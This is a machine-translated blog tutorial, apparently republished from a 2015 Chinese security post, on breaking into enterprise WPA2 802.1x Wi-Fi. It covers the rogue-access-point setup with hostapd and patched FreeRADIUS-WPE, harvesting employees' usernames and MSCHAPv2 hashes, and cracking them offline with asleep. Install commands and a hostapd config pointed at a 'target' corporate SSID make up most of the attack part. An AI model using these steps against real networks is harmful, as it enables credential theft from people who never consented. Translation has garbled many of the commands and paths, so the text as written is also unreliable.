Mickey · 2015/09/02 now

0x01 Introduction

For the enterprise attack of open wireless network (no password), I personally feel that there are two classic attack methods, one is EvilTwin and the other is Karma. Karma is supposed to be an upgraded version of EvilTwin’s attack method. The attacker simply listens to ssiD detection and response packets sent by the client to achieve the middle man, and the victim is rarely aware of it. There was also a misconception that hidden SSIDS were not affected by karma. But the reality is that clients will broadcast probe packets for these networks if they have ever connected to hidden SSIDs. Although karma attacks are over a decade old, they still work on MAC OSX, ubuntu, and older versions of android. The default configuration of Windows 7 is to protect against Karma attacks.

For encrypted wireless networks, for personal networks, many use the wPA2-PSK pre-shared key method to restrict access. Some corporate wireless networks use WPA2 enterprise authentication, while others use radius services to provide a separate user name and password for 802.1x authentication.

0x02 Implementation process

My attack is to use HostAPd to act as a wireless access point, then capture password hash with patched Freeraidus WPE, and finally break password offline with ASLEEP. To counter the relatively secure 802.1x authentication of enterprise wireless networks using radius servers that provide independent user names and passwords.

Equipment required:

TP - LINK TL - WN821N Kali 1.1.0Copy the code

Freeradius-server-wpe_2.1.12-1_i386. deb freeradius-server-wpe_2.1.12-1_i386.deb freeradius-server-wpe_2.1.12-1_i386.deb

Wget https://github.com/brad-anton/freeradius-wpe/raw/master/freeradius-server-wpe_2.1.12-1_i386.deb DPKG -- install Freeradius is - server - wpe_2. 1.12 1 _i386. Deb ldconfig CD/usr/local/etc/raddb/certs. / the bootstrap && ldconfigCopy the code

The installation steps are as follows:

git clone https://github.com/brad-anton/freeradius-wpe.git wget ftp://ftp.freeradius.org/pub/freeradius/freeradius-server-2.1.12.tar.bz2 tar JXVF freeradius is - server - 2.1.12. Tar. The.bz2 patch  -p1 < .. /freeradius-wpe.patch ./configure make installCopy the code

Run the radiUSD -x command to enable the debug mode to verify that the installation is successful

Failed binding to /usr/local/var/run/radiusd/radiusd.sock: No such file or directory
Copy the code

You need to create a corresponding directory

[email protected]:/usr/local/etc/raddb/certs# mkdir -p /usr/local/var/run/radiusd/
Copy the code

To install hostapd, run the following command:

Wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz tar ZXVF hostapd 2.0. Tar. Gz CD hostapd - 2.0 / hostapd/cp defconfig .config makeCopy the code

If the installation prompts:

../src/drivers/driver_nl80211.c:19:31: fatal error: netlink/genl/genl.h: No such file or directory
compilation terminated.
make: *** [../src/drivers/driver_nl80211.o] Error 1
Copy the code

To install the libnL development package, run the following command:

[email protected]:/hostapd-2.0/hostapd# sudo apt-get install libnl1 libnl-dev
Copy the code

Then edit the hostapd-wpe.conf file as follows

interface=wlan0 driver=nl80211 ssid=corp-lobby country_code=DE logger_stdout=-1 logger_stdout_level=0 Dump_file =/ TMP /hostapd.dump IEEE8021x =1 eAPOL_KEY_index_workaround =0 OWn_IP_ADDR =127.0.0.1 auth_server_ADDR =127.0.0.1 auth_server_port=1812 auth_server_shared_secret=testing123 auth_algs=3 wpa=2 wpa_key_mgmt=WPA-EAP channel=1 wpa_pairwise=CCMP rsn_pairwise=CCMPCopy the code

If the ssiD of your target enterprise wireless network is corp-lobby, change ssiD =corp-lobby. Run hostapd-dd hostapd-wpe.conf to enable forged wireless hotspots

If an employee is near you, his phone will automatically connect to your fake wi-fi hotspot and you can pass through

tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
Copy the code

See the caught username and the response and challenge hashes for MSCHAPv2.

With challenge and Response, we can use the Asleep tool to do dictionary-based brute force cracking

Enterprise wireless networks using RADIUS for 802.1x authentication are relatively secure if each user’s password is complex enough. Subsequent researchers abroad also for this kind of attack increases the heart rate for the client and routing equipment tools, the vulnerability of the integration of the project is called Cupid, interested can refer to www.sysvalue.com/en/heartble…

0x03 Reference article

Phreaklets. Blogspot. Sg / 2013/06 / cra… Insights.sei.cmu.edu/cert/2015/0…

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

Decrypt an enterprise wireless network that uses RADIUS to implement 802.1x authentication

0x01 Introduction

0x02 Implementation process

0x03 Reference article

Decrypt an enterprise wireless network that uses RADIUS to implement 802.1x authentication

0x01 Introduction

0x02 Implementation process

0x03 Reference article

Related Posts

Interaction design: Design a better framework for user entry experience

JAVA Design Patterns — Factory Patterns (Part 1)

[Ruby] netease cloud playlist batch download